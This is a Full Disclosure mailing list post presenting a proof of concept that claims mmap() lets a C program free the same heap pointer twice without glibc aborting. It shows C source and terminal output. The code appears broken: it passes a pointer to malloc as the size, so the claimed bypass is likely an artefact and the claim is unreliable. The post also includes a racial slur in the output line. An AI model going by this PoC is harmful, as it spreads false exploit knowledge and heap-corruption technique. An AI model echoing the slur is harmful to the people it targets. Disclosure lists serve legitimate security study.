Tested on: Ubuntu 14.04.5 LTS Version: 4.04 On 24 March 2018 at 18:11, keliikoa kirland <keliikoakirl...@gmail.com> wrote:
> Details from old email: > ========================================= > "Double-Free bypass PoC is self-explanatory as well; 2 free's equate to a > double-free heap corruption segfault; using mmap() disables that segfault > and allows more than 1 free on any malloc'd/mmap'd variable. You can free > `x` 4+ times and it'll still exit cleanly. brk() has already been patched; > which is why i put // 1day next to it; same misalignment/technique to > mmap() which is still vuln/can be abused to write use-after-free's without > having the need to bypass heap corruption segfaults." brk() was equal to > mmap() in PoC below; mmap() --> brk() --> free() --> free() --> clean exit; > now just mmap() --> free() --> free() > > PoC: > ========================================= > joe@ubuntu:~$ cat test1.c > #include <stdio.h> > #include <stdlib.h> > #include <string.h> > #include <sys/mman.h> > > int main(void){ > void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | > MAP_ANONYMOUS, 0, 0); > > void *z = malloc(p); > free(z); > free(z); > } > > joe@ubuntu:~$ ./test1 > *** Error in `./test1': double free or corruption (top): 0x08332008 *** > Aborted (core dumped) > > joe@ubuntu:~$ cat test1.c > #include <stdio.h> > #include <stdlib.h> > #include <string.h> > #include <sys/mman.h> > > int main(void){ > void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | > MAP_ANONYMOUS, 0, 0); > p = mmap(0x2000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | > MAP_ANONYMOUS, 0, 0); > > void *z = malloc(p); > free(z); > free(z); > } > > joe@ubuntu:~$ ./test1 > joe@ubuntu:~$ bl1ng bl1ng n1gg4z ;PppPpP > > References/Credits/Greetz: > ========================================= > ac1db1tch3z koa > https://github.com/x0r1 > http://steamcommunity.com/profiles/76561198333157214/ > > _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/